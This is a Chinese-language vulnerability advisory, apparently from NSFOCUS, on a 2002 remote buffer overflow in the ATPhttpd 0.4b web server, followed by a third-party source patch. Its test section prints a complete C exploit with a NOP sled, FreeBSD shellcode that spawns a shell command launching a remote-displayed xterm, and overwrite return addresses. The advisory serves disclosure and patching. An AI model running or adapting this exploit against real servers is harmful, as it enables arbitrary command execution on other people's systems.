首页 -> 安全研究
安全研究
安全漏洞
ATPhttpd远程缓冲区溢出漏洞
发布日期:2002-07-12
更新日期:2002-07-18
受影响系统:
描述:
Yann Ramin ATPhttpd 0.4 b
BUGTRAQ ID: 5215
ATPhttpd是一款高性能的小型WEB服务程序,由Yann Ramin开发维护。
ATPhttpd对用户提交的请求缺少正确的边界检查,远程攻击者可以利用这些漏洞进行缓冲区溢出攻击。
ATPhttpd 源代码中包含多个远程可利用的漏洞,包括常规的缓冲区溢出,OFF-BY-ONE类型缓冲区溢出,攻击者可以利用这些漏洞以Atphttpd进程权限在系统上执行任意指令。
<*来源:qitest1 (qitest1@bespin.org)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0134.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* atphttpd exploit.
/ The exploit sucks, if you get it wrong the first time the server just dies
/ so I didnt bother adding any offset argument to the exploit. Also if you
/ change the IP addy you may have to change the alignment a little.
/
/ http://www.badc0ded.com
*/
#define ret "\x78\xf5\xbf\xbf"
char FreeBSD[]= /* stolen lsd-pl.net shellcode */
"\xeb\x25" /* jmp <cmdshellcode+39> */
"\x59" /* popl %ecx */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x66\x68""-c" /* pushw $0x632d */
"\x89\xe7" /* movl %esp,%edi */
"\x50" /* pushl %eax */
"\x51" /* pushl %ecx */
"\x57" /* pushl %edi */
"\x53" /* pushl %ebx */
"\x89\xe7" /* movl %esp,%edi */
"\x50" /* pushl %eax */
"\x57" /* pushl %edi */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xb0\x3b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
"\xe8\xd6\xff\xff\xff" /* call <cmdshellcode+2> */
"/usr/X11R6/bin/xterm -display 127.0.0.1:0;";
main ()
{
int i;
for (i=0;i<=501;i++) // this would be a good place to change alignment
printf("\x90");
printf("%s",FreeBSD);
for (i=0;i<=100;i++)
printf("%s",ret);
printf("\n\n");
}
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时没有合适的临时解决方法。
厂商补丁:
Yann Ramin
----------
qitest1 (qitest1_at_bespin.org)提供如下第三方补丁:
==8< atphttpd-0.4b.patch 8<==
diff -u atphttpd-0.4b-old/atphttpd/http_handler.c atphttpd-0.4b/atphttpd/http_handler.c
- --- atphttpd-0.4b-old/atphttpd/http_handler.c Sat Apr 22 05:05:57 2000
+++ atphttpd-0.4b/atphttpd/http_handler.c Fri Jul 12 13:20:16 2002
@@ -235,7 +235,7 @@
(void) sprintf(buffer, "<HTML><HEAD><TITLE>%d %s</TITLE></HEAD>\n<BODY><H2>%d %s</H2>\n", status, title, status, title );
sock_puts(hc[listnum].socket, buffer);
- - (void) sprintf(buffer, "The following error occurred while trying to examine the garbage that you sent this poor webserver: <br><b>%s</b><br><br>\n", text );
+ snprintf(buffer, sizeof(buffer), "The following error occurred while trying to examine the garbage that you sent this poor webserver: <br><b>%s</b><br><br>\n", text);
sock_puts(hc[listnum].socket, buffer);
(void) sprintf(buffer, "<HR>\n<ADDRESS>This cool page was automaticly generated by the trained rodents living inside the <A HREF=\"%s\">%s</A> webserver.</ADDRESS>\n</BODY></HTML>\n", SERVER_URL, SERVER_NAME );
diff -u atphttpd-0.4b-old/atphttpd/main.c atphttpd-0.4b/atphttpd/main.c
- --- atphttpd-0.4b-old/atphttpd/main.c Sat Apr 22 05:06:00 2000
+++ atphttpd-0.4b/atphttpd/main.c Fri Jul 12 13:30:55 2002
@@ -141,13 +141,11 @@
}
}
- - void deal_with_data(int listnum) {
- - char buffer[MAX_BUFFER]; /* Buffer for socket reads */
- -// char *cur_char; /* Used in processing buffer */
- - char method[MAX_STORE], path[MAX_STORE], protocol[MAX_STORE];
- -
- - if (sock_gets(hc[listnum].socket,buffer,MAX_BUFFER) < 0) {
+void deal_with_data(int listnum) {
+ char buffer[MAX_BUFFER];
+ char method[MAX_STORE], path[MAX_STORE], protocol[MAX_STORE];
+ if (sock_gets(hc[listnum].socket, buffer, MAX_BUFFER - 1) < 0) {
close(hc[listnum].socket);
hc[listnum].socket = 0;
} else {
@@ -155,7 +153,7 @@
* *
* Right now it is very dumb, and only checks for a get header *
* Improvements? */
- - sscanf( buffer, "%[^ ] %[^ ] %[^ ]", method, path, protocol );
+ sscanf(buffer, "%1023s %1023s %1023s", method, path, protocol);
if ( strcasecmp( method, "get" ) == 0 || strcasecmp( method, "head" ) == 0) {
strcpy(hc[listnum].path, path);
==8< atphttpd-0.4b.patch 8<==
浏览次数:3457
严重程度:0(网友投票)
绿盟科技给您安全的保障